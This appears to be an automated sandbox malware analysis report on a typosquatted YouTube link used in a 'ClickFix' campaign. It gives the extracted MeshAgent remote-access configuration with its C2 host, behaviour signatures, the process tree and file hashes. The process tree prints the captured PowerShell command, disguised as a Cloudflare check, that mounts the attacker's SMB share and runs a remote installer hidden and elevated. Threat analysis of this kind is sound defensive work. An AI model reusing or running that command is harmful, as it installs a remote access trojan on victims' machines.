Resubmissions

09/04/2025, 17:31

250409-v3wdfaxycw 10

09/04/2025, 17:30

250409-v264jsxpz2 8

09/04/2025, 17:26

250409-vzvbzaxpt8 4

Analysis

  • max time kernel
    33s
  • max time network
    35s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/04/2025, 17:31

General

  • Target

    https://www.youtude.net/watch?v=i50wel2lVsw

Malware Config

Extracted

Family

meshagent

Version

2

Botnet

clickfix

C2

http://aaso12.duckdns.org:443/agent.ashx

Attributes
  • mesh_id

    0x950AE7E094D02F632FBC73D5C2419AAC81F9563B8A37915670D8453B94FB3DA11961008E153469470F365ACD78AB3512

  • server_id

    22F126392DFCD804B6AF755F256A707D53ED8D200650E6BC853C95860F21B6B7049AF4EBEAB393E6EE1A9315B396BFC8

  • wss

    wss://aaso12.duckdns.org:443/agent.ashx

Signatures

  • Detects MeshAgent payload 2 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Meshagent family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 64 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 49 IoCs
  • Modifies registry class 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtude.net/watch?v=i50wel2lVsw
    1⤵
    • Drops file in Program Files directory
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:5308
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x2ec,0x7ffb7dfef208,0x7ffb7dfef214,0x7ffb7dfef220
      2⤵
        PID:2692
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1932,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=2276 /prefetch:3
        2⤵
          PID:5804
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2248,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=2244 /prefetch:2
          2⤵
            PID:1444
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2548,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=2544 /prefetch:8
            2⤵
              PID:3276
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3520,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:1
              2⤵
                PID:4680
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3532,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=3568 /prefetch:1
                2⤵
                  PID:4688
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5020,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=4912 /prefetch:8
                  2⤵
                    PID:5932
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4992,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=5080 /prefetch:8
                    2⤵
                      PID:4312
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5372,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=5488 /prefetch:8
                      2⤵
                        PID:1840
                      • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5812,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=5832 /prefetch:8
                        2⤵
                          PID:2528
                        • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5812,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=5832 /prefetch:8
                          2⤵
                            PID:5424
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5528,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=5624 /prefetch:8
                            2⤵
                              PID:1044
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5728,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=6160 /prefetch:8
                              2⤵
                                PID:5732
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6128,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=6140 /prefetch:8
                                2⤵
                                  PID:4128
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=704,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=6148 /prefetch:8
                                  2⤵
                                    PID:4344
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6248,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=6244 /prefetch:8
                                    2⤵
                                      PID:2332
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6040,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=6288 /prefetch:8
                                      2⤵
                                        PID:1548
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                      1⤵
                                        PID:4564
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
                                        1⤵
                                          PID:3908
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
                                            2⤵
                                              PID:1548
                                          • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
                                            "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)
                                            1⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5352
                                            • C:\Windows\system32\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall
                                              2⤵
                                                PID:3460
                                                • C:\Windows\system32\net.exe
                                                  net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!
                                                  3⤵
                                                    PID:5600
                                                  • \??\UNC\aaso12.duckdns.org\shear\s.exe
                                                    \\aaso12.duckdns.org\shear\s -fullinstall
                                                    3⤵
                                                    • Sets service image path in registry
                                                    • Drops file in System32 directory
                                                    • Drops file in Program Files directory
                                                    PID:384
                                              • C:\Program Files\Mesh Agent\MeshAgent.exe
                                                "C:\Program Files\Mesh Agent\MeshAgent.exe"
                                                1⤵
                                                • Executes dropped EXE
                                                • Drops file in System32 directory
                                                • Drops file in Program Files directory
                                                • Modifies data under HKEY_USERS
                                                PID:5836
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -noprofile -nologo -command -
                                                  2⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Drops file in System32 directory
                                                  • Modifies data under HKEY_USERS
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:6084

                                              Network

                                              MITRE ATT&CK Enterprise v16

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Program Files\Mesh Agent\MeshAgent.exe

                                                Filesize

                                                3.3MB

                                                MD5

                                                e2264eb1b5f614db39e8dadde0c4c487

                                                SHA1

                                                6cd4fbf6499071686fc8c448307f17d141199ea1

                                                SHA256

                                                3f38dab1278850190a70c91a9671fdada649bbd6f8abafba9970c7f43c59565d

                                                SHA512

                                                cc1347041f87d823f304afad43d225a6c48bc2016d724a1b2ac5ec3e52fbd7adf846f5bdee6f6dde8de6fe0c29c0bd0d4502edb0a30a59b9ac709703415b7923

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                Filesize

                                                280B

                                                MD5

                                                01cc3a42395638ce669dd0d7aba1f929

                                                SHA1

                                                89aa0871fa8e25b55823dd0db9a028ef46dfbdd8

                                                SHA256

                                                d0c6ee43e769188d8a32f782b44cb00052099222be21cbe8bf119469c6612dee

                                                SHA512

                                                d3b88e797333416a4bc6c7f7e224ba68362706747e191a1cd8846a080329473b8f1bfebee5e3fe21faa4d24c8a7683041705e995777714330316e9b563d38e41

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

                                                Filesize

                                                2B

                                                MD5

                                                99914b932bd37a50b983c5e7c90ae93b

                                                SHA1

                                                bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                SHA256

                                                44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                SHA512

                                                27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

                                                Filesize

                                                107KB

                                                MD5

                                                2b66d93c82a06797cdfd9df96a09e74a

                                                SHA1

                                                5f7eb526ee8a0c519b5d86c845fea8afd15b0c28

                                                SHA256

                                                d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954

                                                SHA512

                                                95e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

                                                Filesize

                                                2B

                                                MD5

                                                d751713988987e9331980363e24189ce

                                                SHA1

                                                97d170e1550eee4afc0af065b78cda302a97674c

                                                SHA256

                                                4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                SHA512

                                                b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

                                                Filesize

                                                40B

                                                MD5

                                                20d4b8fa017a12a108c87f540836e250

                                                SHA1

                                                1ac617fac131262b6d3ce1f52f5907e31d5f6f00

                                                SHA256

                                                6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

                                                SHA512

                                                507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                Filesize

                                                16KB

                                                MD5

                                                84673b27f29b9b405937de306f8d5fae

                                                SHA1

                                                703fb4f74bce2fa0d6034f370afe959d0afaed69

                                                SHA256

                                                272c8299983facd81cf61e7888b93c2f7908f4c75de1237918dde6b15cbbe0b4

                                                SHA512

                                                3383c65e1c0e9496d2f4fa5c2a73f3af9d20ae8e0e8b20c18447b83f559dd53332499af17c3261c9d0277621dc5cce2ff4722562119c6f3d3df6fb5ddcf56d71

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                Filesize

                                                36KB

                                                MD5

                                                4b69e670bfbae0311a383e3b09ac84fc

                                                SHA1

                                                004df14bc470b739f9c7d0b67fc76fc1df3c381b

                                                SHA256

                                                3deb367cfc2af784d1bea8725685d23802a93ee5918447d9bdb33e42c61ecb83

                                                SHA512

                                                df2576bcf9ac545e20ea2cf614a3f39acc2589dbb62d0a23f933898f1bf3b9dcc5f42d997d34f4a08352cc0494da1643625188dbf90e8a19c72be906f6934fe9

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

                                                Filesize

                                                22KB

                                                MD5

                                                7a8cf1d8988e9ae9f89ca0cf7368640a

                                                SHA1

                                                6f50d4436cdbe0bb397e6d43c7f6698acd71b8ac

                                                SHA256

                                                1446763674f831a12251a6c5d2ad63e98e1c8636c7ef2953dfe49c8c9b8dfa22

                                                SHA512

                                                0ccebe530a0d95577a7b0aa0564a582ba8e67944bff223a685b7226b719475d5195e25994eb42d4d8611fb11e83de871a4047f40bb8dd0bf508c924521110811

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                Filesize

                                                40KB

                                                MD5

                                                357991d7f9916eb2a1f3a942f485ec80

                                                SHA1

                                                5935be9eb03ec2787c8292ce74277c08fc9010f6

                                                SHA256

                                                eec47cd09a34d353b176043024849d1bce69e1fdd60975fc76e4fb58195e2da2

                                                SHA512

                                                29c24fde36875bcde9364057868ee5307e815c566234177dfb658de7d153bb56c635c714eaa07abf52928415c41a4f0433f557e741f178d69f44e43457448b04

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                Filesize

                                                49KB

                                                MD5

                                                5a3b89edc852f0133a47134a86a45fb3

                                                SHA1

                                                587d0767767c101cb785762e90ff0ae793f544d3

                                                SHA256

                                                0b85d97ab2ed2ccf53b763d8fb63c46e07063a7e688373e5b7b369d2859be247

                                                SHA512

                                                e3cfd5080e560446adb01e3f5783ab4ca2c9931c63e20181c5b8aece27dfc49c3d09ba5ee4abf653a50d6b8801b5c0d904f92931d189b9090ffb859d838a7cf0

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                Filesize

                                                41KB

                                                MD5

                                                31b17d41a06f330d2c2edba2b18317b7

                                                SHA1

                                                52a12bdf8e1566c0949521d417c798b4ef4c90b2

                                                SHA256

                                                34b80aaca680b9ee15223812aa83db7fd69dd1ce6845a6e675b819780ff333f5

                                                SHA512

                                                5d4ecb2ad2d8fe33366d1d85fdc0fe009c055ad52269725a3808d934b5494e7591cf62e11dc27e4605d68593dc374c640d8f66bfd0341fcdc18f60057c929538

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\extensions_crx_cache\ghbmnnjooekpmoecnnnilnnbdlolhkhi_1.fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

                                                Filesize

                                                152KB

                                                MD5

                                                dd9bf8448d3ddcfd067967f01e8bf6d7

                                                SHA1

                                                d7829475b2bd6a3baa8fabfaf39af57c6439b35e

                                                SHA256

                                                fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

                                                SHA512

                                                65347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de

                                              • C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                Filesize

                                                2KB

                                                MD5

                                                22fde5566bf1ffa5c137e63bd66d7765

                                                SHA1

                                                d3a9a7f07c211a08875f1e3a288661fa7e6fe245

                                                SHA256

                                                7ed40f1b94ab3eb0633617e13e27c7133680c60e3fc6dc27364779a36dbe69e2

                                                SHA512

                                                30280847c39a27846b8092edd9c104998883ab5b10b27c046f4468db5998632243fe0da047e24a069d9a2894fa398c9f9b32003367c6a4cb95ae5c134914b3fb

                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h54s0xrf.at3.ps1

                                                Filesize

                                                60B

                                                MD5

                                                d17fe0a3f47be24a6453e9ef58c94641

                                                SHA1

                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                SHA256

                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                SHA512

                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                              • C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\5CB41B28531003B1CA711172FA90258DA5879AA4

                                                Filesize

                                                1KB

                                                MD5

                                                4a7c389d057f602875db54f55bcb5938

                                                SHA1

                                                ffbd9b544696344fa017abea645c82898cd4f2b4

                                                SHA256

                                                ef305cf93cc62953e117fe80dd09e9ce657e6e7dcd46138d7885117189efbc7e

                                                SHA512

                                                e544ac176f00a4eed554670a815eea53504e244639121f588e37ec8448fb83ee17dde3c436065818cf31a10d7709869076048468f06e3292e7d4d06fa86fd72f

                                              • memory/384-491-0x00007FF6FA2E0000-0x00007FF6FA655000-memory.dmp

                                                Filesize

                                                3.5MB

                                              • memory/5352-460-0x0000026D4E400000-0x0000026D4E422000-memory.dmp

                                                Filesize

                                                136KB

                                              • memory/6084-517-0x00000217FC920000-0x00000217FC964000-memory.dmp

                                                Filesize

                                                272KB

                                              • memory/6084-518-0x00000217FC9F0000-0x00000217FCA66000-memory.dmp

                                                Filesize

                                                472KB